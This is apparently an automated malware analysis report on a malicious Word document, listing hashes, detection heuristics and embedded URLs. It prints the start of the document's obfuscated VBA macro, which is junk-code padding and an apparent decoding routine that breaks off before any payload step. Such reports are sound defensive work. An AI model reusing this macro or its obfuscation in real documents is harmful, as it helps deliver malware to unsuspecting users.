Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2662fa08be07f8bd…

MALICIOUS

Office (OLE)

199.0 KB Created: 2018-04-12 19:36:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 0478af5cfe7443414e1a0a8778396064 SHA-1: d7da39faff97b3f3b034ec74a52ad87dd922e7b8 SHA-256: 2662fa08be07f8bdf4a601bcacecd94dda0dd58ebb8778ad67f09060c8680cc5
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a Microsoft Office document containing a malicious VBA macro, indicated by multiple high-severity heuristics including OLE_VBA_AUTOOPEN and OLE_VBA_CREATEOBJ. The macro is designed to execute code, likely to download and run a secondary payload. The presence of an unknown reputation URL suggests a potential command and control or download source.

Heuristics 8

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.isprambiente.gov.it/files/temi/rischio-industriale/stabilimenti.jpg In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 203636 bytes
SHA-256: 2b203354b168fd698f323b990f69ba7d932f261fc4813cec8a803a2a218a6d9a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wzWNDP"
Public Function mX5GNJC4Z6coaHXk(io0naKp25KyF6oj As String, Optional UmhZLcESgC2F6i As Boolean = True) As String
Static iXlEUNr2bgKBd1R(0 To 255) As Byte
Dim yqSsfl3Vf6YSok, GY7T2C2fZIS As String
yqSsfl3Vf6YSok = 9
GY7T2C2fZIS = 9
#If yqSsfl3Vf6YSok > GY7T2C2fZIS Then
Dim Fqg9ranLICt As LongPtr
#Else
Dim Fqg9ranLICt As Integer
Fqg9ranLICt = 9 + 9
Dim kpIyxkR9E4U As Integer
For kpIyxkR9E4U = 0 To yqSsfl3Vf6YSok
kpIyxkR9E4U = kpIyxkR9E4U + 1
Next kpIyxkR9E4U
#End If
Dim NKaY4WWygvHgiX, jRLEMSNZDXw As Integer
NKaY4WWygvHgiX = 8
jRLEMSNZDXw = 9
#If kkf1GCvtjcg <> 0 Then
kkf1GCvtjcg = kkf1GCvtjcg + 4
Dim Mu3dNddTzyb As Variant
Else
Dim Mu3dNddTzyb As Object
#End If
If NKaY4WWygvHgiX > jRLEMSNZDXw Then
For cwhIgNGP0HCmNv = jRLEMSNZDXw To NKaY4WWygvHgiX
jRLEMSNZDXw = jRLEMSNZDXw / NKaY4WWygvHgiX
Next cwhIgNGP0HCmNv
End If
Dim BaKtEt6tk7PDtU As String
Dim yghnUmZMHqr As String
yghnUmZMHqr = ThDlaBcmmfr
BaKtEt6tk7PDtU = SdBf3Ybo7sH
If (StrComp(BaKtEt6tk7PDtU, yghnUmZMHqr, vbTextCompare) <> 0) Then
MsgBox ("Optional: fbMyJoSuxTeBrM.")
End If
Dim tqX0bTSAQSsKRA, pKBtiyktE1w As String
tqX0bTSAQSsKRA = 3
pKBtiyktE1w = 2
#If tqX0bTSAQSsKRA > pKBtiyktE1w Then
Dim CcQRshD8GOI As LongPtr
#Else
Dim CcQRshD8GOI As Integer
CcQRshD8GOI = 3 + 2
Dim uTmRgructhr As Integer
For uTmRgructhr = 0 To tqX0bTSAQSsKRA
uTmRgructhr = uTmRgructhr + 1
Next uTmRgructhr
#End If
Dim rTu4zrinoirCLDU6() As Byte, ynTzNrCCX83ZGP() As Byte
Dim ivDr2KAZxEn23M As String
Dim BdXfhZlc43axfa, uKTCqTIHIrK As Integer
BdXfhZlc43axfa = 2
uKTCqTIHIrK = 3
#If hxbLE4y1BKw <> 0 Then
hxbLE4y1BKw = hxbLE4y1BKw + 8
Dim d1NNVkxKv8P As Variant
Else
Dim d1NNVkxKv8P As Object
#End If
If BdXfhZlc43axfa > uKTCqTIHIrK Then
For sAk16rEV4UpV2j = uKTCqTIHIrK To BdXfhZlc43axfa
uKTCqTIHIrK = uKTCqTIHIrK / BdXfhZlc43axfa
Next sAk16rEV4UpV2j
End If
Dim V8bkN7GzqPc3fU As String
Dim hLT8KJAwk29 As String
hLT8KJAwk29 = VGOGzmVtKdk
V8bkN7GzqPc3fU = lrnBfKwAps6
If (StrComp(V8bkN7GzqPc3fU, hLT8KJAwk29, vbTextCompare) <> 0) Then
MsgBox ("Optional: ZywOTywKnYily0.")
End If
Dim rLnd3WijknvSm8 As Integer
For QViLWB0Tff7 = 1 To 14
rLnd3WijknvSm8 = QViLWB0Tff7
Next QViLWB0Tff7
Dim HMBnVaVB11GyEfn As Long, JaxGjMQGEEHUrhxyJg As Long
Dim YsI8ijqncOyWWB As String
YsI8ijqncOyWWB = Application.UserName
Dim kWqybeuBAyQ, zSAhzeeWcrTsDX As Integer
zSAhzeeWcrTsDX = Len(YsI8ijqncOyWWB)
Dim ZMoToXrB00J As Collection
While zSAhzeeWcrTsDX > 4
kWqybeuBAyQ = kWqybeuBAyQ + 5
zSAhzeeWcrTsDX = zSAhzeeWcrTsDX - 4
Wend
Dim BUz1GVgLhq9KlV As Collection
Set BUz1GVgLhq9KlV = New Collection
BUz1GVgLhq9KlV.Add "ZMoToXrB00J"
BUz1GVgLhq9KlV.Add "jrnxIICrXtN"
BUz1GVgLhq9KlV.Add "g8SbgRNVSHjNge"
Dim pFTAkJOytcKJjZ As Integer
For pRbwjiXjpBq = 1 To 15
pFTAkJOytcKJjZ = pRbwjiXjpBq
Next pRbwjiXjpBq
Dim daR1CxMz1wCK4z As Integer
Dim e3Y47B5ldyL As String
daR1CxMz1wCK4z = 4244
Dim FzvkgWscNxI As Integer
e3Y47B5ldyL = Right(CStr(daR1CxMz1wCK4z), 1)
FzvkgWscNxI = CInt(e3Y47B5ldyL)
For UJnLUO1I3jC = FzvkgWscNxI To 79
daR1CxMz1wCK4z = daR1CxMz1wCK4z + 7
Next UJnLUO1I3jC
If iXlEUNr2bgKBd1R(0) = 0 Then
Dim iXI96hEjjH0uE6 As String
Dim DTJc9u7ywAC As String
DTJc9u7ywAC = RJwE0qk6Fjt
iXI96hEjjH0uE6 = TRtZiyZhwa9
If (StrComp(iXI96hEjjH0uE6, DTJc9u7ywAC, vbTextCompare) <> 0) Then
MsgBox ("Optional: kvngtivM0kI7lY.")
End If
For HMBnVaVB11GyEfn = 0 To 255
Dim ctd1jafW9YbUuh As Integer
Dim co2mikGl5RW As String
ctd1jafW9YbUuh = 4217
Dim whFL5qU3njp As Integer
co2mikGl5RW = Right(CStr(ctd1jafW9YbUuh), 1)
whFL5qU3njp = CInt(co2mikGl5RW)
For xxoSr1YiWVj = whFL5qU3njp To 29
ctd1jafW9YbUuh = ctd1jafW9YbUuh + 4
Next xxoSr1YiWVj
Dim cFWm1uUBZSqT0P As Integer
For WQdQhSeUniV = 7 To 74
cFWm1uUBZSqT0P = WQdQhSeUniV
Next WQdQhSeU
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.